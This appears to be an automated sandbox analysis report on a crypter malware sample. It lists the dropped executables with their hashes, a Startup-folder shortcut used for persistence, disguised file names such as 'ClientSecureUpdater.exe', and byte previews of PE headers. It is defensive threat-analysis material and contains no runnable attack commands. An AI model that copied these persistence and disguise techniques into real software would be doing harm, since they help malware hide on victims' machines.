Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.f...............#.v........................@.......................................@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............\|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\twekgmwoe\todelete

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.255945210992157
Encrypted:	false
SSDEEP:
MD5:	88371DEF959A5A81F5EDFBA6BB5571A4
SHA1:	488D4B7DBB5650E0B6BF6C07F8CF01B451D0405D
SHA-256:	937D31B8C5E79F5AC78DEB0FB708BD4A4B3B98CA596FD87951FC0A76F380AB97
SHA-512:	FF51CD375C840024FD434015F38AEFBA9AE66A820ECA6F3446DEFE75C761CB3BB456F9D86D5F5DB3B0BFF495946AA4F327010DB17EC1B7FF4502541840CFE7CA
Malicious:	false
Reputation:	unknown
Preview:	["C:\\Users\\user\\Documents\\iofolko5\\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a","C:\\ProgramData\\jewkkwnf\\jewkkwnf.exeWqTnzVEcT35t5u1k"]

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Sep 21 11:48:41 2024, mtime=Sat Sep 21 11:48:41 2024, atime=Sat Sep 21 11:48:11 2024, length=4249600, window=hide
Category:	dropped
Size (bytes):	1249
Entropy (8bit):	4.910675452619441
Encrypted:	false
SSDEEP:
MD5:	238720681D4807CB2EDC7EC4AA40CDA1
SHA1:	AD258212C499EFC3B1A2129372EFBE21F28DBA06
SHA-256:	C66B19E8344D8CD045E39D7238B0FE9308AEE34211D65BB1C646CDD021A12D56
SHA-512:	A523F780B44B473B27F006351F94E227806869196E7C4DCEA689D5C3EDE10F49F9E64F7B855A59BA72171F8C469C88411FA86110F47908549095D18E2E77624B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....a.$....a.$.....?.$.....@.....................4.:..DG..Yr?.D..U..k0.&...&.......bBDj....G.y$...0...$.......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG5Y.e..........................=...A.p.p.D.a.t.a...B.P.1.....5Y.f..Local.<......EWsG5Y.f.........................Z.8.L.o.c.a.l.....N.1.....5Y.f..Temp..:......EWsG5Y.f..........................q..T.e.m.p.....f.1.....5Y.f..POWERE~1..N......5Y.f5Y.f.....2....................V...P.o.w.e.r.E.x.p.e.r.t.N.N.T.....r.2...@.5Y.f .POWERE~1.EXE..V......5Y.f5Y.f.....2....................R.P.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.......q...............-.......p............q=+.....C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe....P.o.w.e.r.E.x.p.e.r.t.N.N.T.>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.........\|....I.J.H..K..:...`.......X.......580913...........hT..CrF.f4... .Z.E._c...,...

C:\Users\user\AppData\Roaming\ahcsduh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	418816
Entropy (8bit):	6.7434348766555265
Encrypted:	false
SSDEEP:
MD5:	2F59FBD6623872FBDC2F63D18023BFDA
SHA1:	A71FD212DC780EDD062584ACFE3FC28A8090D039
SHA-256:	0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
SHA-512:	BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	183943
Entropy (8bit):	7.998396320845189
Encrypted:	true
SSDEEP:
MD5:	E6BEADEF5F58C272397A49C9D5715641
SHA1:	C324EAA435785C9C1ECEF611A9D1CFE65A166314
SHA-256:	183DF35420C19334BAC8DDE9C9A581AB232215CA4D3393E5688F31E69F42290A
SHA-512:	4FB61EFA95ED3044370C7C9F766C47DF67415AE856C85F78F55009707738BCB58E815C3F2902FE925AEDD31A4C27EB8FF4519DB371B0C61FEBD472C26910347C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..f.............................(... ...@....@.. ....................................`..................................(..S....@..............x=..(&...`......`'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......................................................................$..hII#MtzNi.T.............`...&g~....n~^..r.b..f.r.Ga.x.\|....}.Ib....PL:d.6... ......:E$7....e.aW...!..m5..5@..7W...........H:....+.(g...\[.k.z5.b....yd.)8....]K.._.}oB$......<]....K..%...On..j...nA}.P^.f.6Z\|.._..XcsF^....O].CQ..w....K..ts........F...H...].?WT>"f.].*..v.......$_...Lm.?.AO[9....e.8.~.e.....]NH.[L7\C...I.{.\|.A....\..F.L;M..CG.:..d..K>.....6"b..Ofy...u8...:.&.Qe7

C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	415943
Entropy (8bit):	7.9904721611397775
Encrypted:	true
SSDEEP:
MD5:	D399F8ABCA97B04F273F04322E4378BE
SHA1:	C62B4FA298116B3DD6943E950C8DFF80BA8AC64C
SHA-256:	EEB12C473444D2ACDE8CB542B65CCFDB0E8551B95B59969FA531574283BA78C1
SHA-512:	7104CD7C79880DDE790E7B28DA423013F4C1D9A8E6D365F9B2B1E36FDE62003F6D2635C4EF7DA35B4C887BC8527FA47D949B7EF1128BE5318A69EC02BAF6FF07
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H.......................................................................j....(.m........u..B...+..g....M.....D..g..%n.w..M..O....@...f...[a....`.3..y..\L..y...G.........8...n..E.up.flqh...:...1H.C.................i..]6..NgV...F.....t.A...b..h...\........r...&.&*kM.....Pa.FG....-I.%...T....'.\|z.A......Sh.../......F...@...F.&...l...s.....J..F....j..5.e7....O.h..-k..U.N..`.........v.....^....S..;v.^..?.!.ZQx..^..Sh.4 .^..\.@.....-b.7..?......7+8....1....T6.

C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423328
Entropy (8bit):	7.9889468260390535
Encrypted:	false
SSDEEP:
MD5:	A463E516041F4BC84F03BC8FE2B643DD
SHA1:	5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
SHA-256:	68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
SHA-512:	5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H......................................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.

C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	331640
Entropy (8bit):	7.987353721341769
Encrypted:	false
SSDEEP:
MD5:	E8E6CD9EC48FAFCCC174F7BF07D045E2
SHA1:	0DFCCF235DC62D2592F5062A1B9691043C14CC9E
SHA-256:	76B4E6A99335D5FFA35E15863B544BF2EC9ED76CC8320E1D3E2F521A27018D07
SHA-512:	33E6C097784B29D3CBA17B751B3E87EA9D583DBF19646897843471F96EFD88E9B64D529A5F2C9FA13B9EDAD5D7CCF8D454E496FC63F1B288C44FD8509E8C1459
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..f............................^.... ........@.. .......................@............`.....................................S.......................x)... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H...........................................................................6.....Z...9)..^........j...PtY.#..A.R.\...d.4..7.Z..&w.w\|.5.':.T..~...x....T...7M.w.Sa...Qp.R.t.u...qzD(&...4.. .:O.d....V[. c..l.prK.]..v....Y\_.{.....'..T.-f..av...w(H.n.]..gpj)...OKV.......q..Q..y.P.!..Y;O.0.....@.y...t.".u...7n.B.=.......C^.=.Mi......4......b.~..t..d.......#......Xa`.I\.R!...'}>.}..X...J.v.__...n.....\..f.'>...}....."..j(..vFQC..'l..'7..p..:............

C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3037032
Entropy (8bit):	6.781602952551882
Encrypted:	false
SSDEEP:
MD5:	098E15E88E5332253356C78BADF8D479
SHA1:	D5AAEB94EC0D92BD9AA7D4B76860E9C25CF10EE2
SHA-256:	6B89CDFE0D3EBC90994EE564AAC9C88B0DF80F25720AEDADFF660A0D079AD0C9
SHA-512:	27E7480332F7F07916399D9515057750E43F42D68AEBA095C77AB76616F899F49269EC78738F10D39D6869F67FF4EF768C03BA52A649C652AFA9EE161F2E1892
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3141632
Entropy (8bit):	7.172503458895126
Encrypted:	false
SSDEEP:
MD5:	1FEDF314D7C5ED06FF6833C9C8FE5441
SHA1:	AC0F8C841D197A3DB368A3C646D242541ECE144B
SHA-256:	279AF267D365013227156575DCF61B6977CE4051DD4632515BD224314CEA7C59
SHA-512:	6328A2828A77FDAC906710552842A584208066033119F62AE0E97DA88DB37C35C02D368B554E58030D949E2DAD19715BF351284332706D939F8C6754D4DC9242
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..........)).. ...@)...@.. .......................`0...........@..................................)).K....`)......................@0.....O)).............................................. ............... ..H............text.....).. ....)................. ..`.sdata.......@).......).............@....rsrc........`).......).............@..@.reloc.......@0......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22487040
Entropy (8bit):	5.272510082812899
Encrypted:	false
SSDEEP:
MD5:	CB3952F1852179348F8D2DB91760D03B
SHA1:	4D2C9D9B09226524868760263C873EDC664456A9
SHA-256:	A9EA40670A686E175CC8C32E3FC6BA92505379303D6524F149022490A2DDA181
SHA-512:	163006435A30B31FF0B079215EFC0CEDF6A624516AF1FFCCBC6144CFDB205B822029D523F28EC86E0391AF1B741771B860CF4D3492C87567A55F541A39C69D11
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..h...W..,.............@..............................`......*W...`... ...................................... Z.N....0Z.X....pZ......pM..f...........`\..P..........................._M.(....................4Z.X............................text... .h.......h.................`.``.data....+....i..,....h.............@.`..rdata...-...@p......&p.............@.`@.pdata...f...pM..h...TM.............@.0@.xdata..`.....P.......P.............@.0@.bss.....+....P.......................`..edata..N.... Z.......P.............@.0@.idata..X....0Z.......P.............@.0..CRT....p....PZ.......P.............@.@..tls.........`Z.......P.............@.@..rsrc........pZ.......P.............@.0..reloc...P...`\..R....R.............@.0B................................................................................................................................

C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	361336
Entropy (8bit):	7.9885937954241255
Encrypted:	false
SSDEEP:
MD5:	D687AF3B103399AA245807BB719878B7
SHA1:	C3D45032BFD13C7DC75F08E55CABA56D0A1D4A42
SHA-256:	CC7056857CEC7D81101AF02D79431F4E193090FEF7D505D1970D4B2846F385B9
SHA-512:	8482B42FB16963BDCC6BCE162F79F64E28BFA46977788DF2044A7A0E805E67D44991C6EF24E1DD45643C7F69ABC66DEB257F23E7680B25DA8C486DC5BA0FF978
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................P...........n... ........@.. ....................................`..................................n..S....................Z..x)..........`m............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............X..............@..B.................n......H........^................................................................$....sp...k.Ta.....\|.K..?wN...-..m..E...C.9..-#....f..=...5spJ......z.s.._4v.ZUO.w...b...ne.sR..v@sO.4.] ......V.L.....TV[.X.vF......\|..hI..$<gb...v-Cm<[6R...8..!m..........'.?j....W`JI..!k........,.O.<9..W...X..LEq.... !......Q..$.@....,99..~...%(...\..\|B..#.a... ......w..ZV..9.k..F.Zl........[.O..t....Gz&..c..yk&.N..;........T.fh.]Z.%....).=...-.Ig..T....1.!..z...E...9.....x.

C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3143204
Entropy (8bit):	7.997368405690321
Encrypted:	true
SSDEEP:
MD5:	0A02550E0EA5490D4D80EE79661C99E1
SHA1:	167AD22FF6368C3DBC4D4EE71E4C3A2D39C6F5C1
SHA-256:	9471DD61FDCABDFFA51B0FB0BF3DE28E1B2B1C4277F5BF784484518FC67716B5
SHA-512:	61C36A653C4C59017AE54FECC51CA92C36CA13CF118B7212CFB86F5D1D8ECEE42ACD946835F62EC5D57C640C7A7983DE9B2F9AD1C6EBB5A8AB062A0337861EB3
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	418816
Entropy (8bit):	6.7434348766555265
Encrypted:	false
SSDEEP:
MD5:	2F59FBD6623872FBDC2F63D18023BFDA
SHA1:	A71FD212DC780EDD062584ACFE3FC28A8090D039
SHA-256:	0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
SHA-512:	BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11496960
Entropy (8bit):	7.95681767955623
Encrypted:	false
SSDEEP:
MD5:	D60D266E8FBDBD7794653ECF2ABA26ED
SHA1:	469ED7D853D590E90F05BDF77AF114B84C88DE2C
SHA-256:	D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
SHA-512:	80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6666862
Entropy (8bit):	6.624649438102188
Encrypted:	false
SSDEEP:
MD5:	8FB3610C4BA81A5A93666562E712740A
SHA1:	FB8B6774E490680C1E04494D101F6CED3B7BE816
SHA-256:	8F72E50FAC72D3C5880F79997F6CF38026B00D6F907BCD80C5D780CF92DB7158
SHA-512:	6A833782EB81204D420841ACC1CD0D5F03BCE00D9725D850E5EF83A5C39C084E7BD1285582531A4092565BE9FA8409A7CFBCC0B74A5CEFD6DFAF9D4E4F5FD5CB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}.f.t_..%.........#.@H...Z...f..........PH...@.................................).f....... .........................B......................................h ............................H....................................................text....>H......@H.................`.P`.data........PH......FH.............@.`..rdata..8....pH......`H.............@.`@/4............I.......H.............@.0@.bss....T.f...L.......................`..edata..B.............L.............@.0@.idata................L.............@.0..CRT....4.............L.............@.0..tls.................L.............@.0..reloc..h ......"....L.............@.0B/14...................Z.............@..B/29......... ........Z.............@..B/41.....XL.......N...\|\.............@..B/55.....B.... ........\.............@..B/67.....T.............].............@.0B/80.....a....0........].

C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	976632104
Entropy (8bit):	0.04563192849725171
Encrypted:	false
SSDEEP:
MD5:	CD0A0C5A7305A1E9A9C9F8B609732DB1
SHA1:	E24EF707F3044865524ACF986401F4A8F60CC9EE
SHA-256:	9399ED901C69CFDA8B3E5FAB16A499FF927A3975AE5B1077C0A2C810D6193A81
SHA-512:	1C205C5697CA39DCE1AD5FC3EFE0D8E6E4B783B89A3DF8F33D5B97667338AC8134FC1E989F04550BD47B5A32ACED85A8CE245FAC7F84514C0CAC674A17089523
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.394431195264694
Encrypted:	false
SSDEEP:
MD5:	42BB0DE5407C3DC4822F726E0F36ED80
SHA1:	B389B615CEC900E53302425E3980EF791F386941
SHA-256:	D5AAFB00533A11C1066C3A90F010992FCC998FB5778D314BA64F4D4ABD6DE124
SHA-512:	886720825F73FDEAB614C3B47554DDBEEE83CB561398D97B6FC60C1687259D6BA2DCAA1203A9B921F549F86CB6BC61EE695EBB3EB705EBDA50AB4BE05E3C7C59
Malicious:	false
Reputation:	unknown
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm")n.$................................................................................................................................................................................................................................................................................................................................................/y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	0.9182958340544896
Encrypted:	false
SSDEEP:
MD5:	0C11BB317BD26E93C30821526C3834BD
SHA1:	70B99746FBF26B12B541D4C1A8451FD98B249BB2
SHA-256:	7393BA4F11E19A5F6BEE10ED995B0D959A52C4470855F6D68D4D1E34E26CB70F
SHA-512:	62AD6D1D2DABFFDBC800B416A01546C0337EC8B350112E6C09101D847D42BFBDE44C2B3949D3397FCC08BBF2800604FB5A700D71750DB24CF7E15D67AB07E726
Malicious:	false
Reputation:	unknown
Preview:	...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.941763956114646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
File size:	2'457'088 bytes
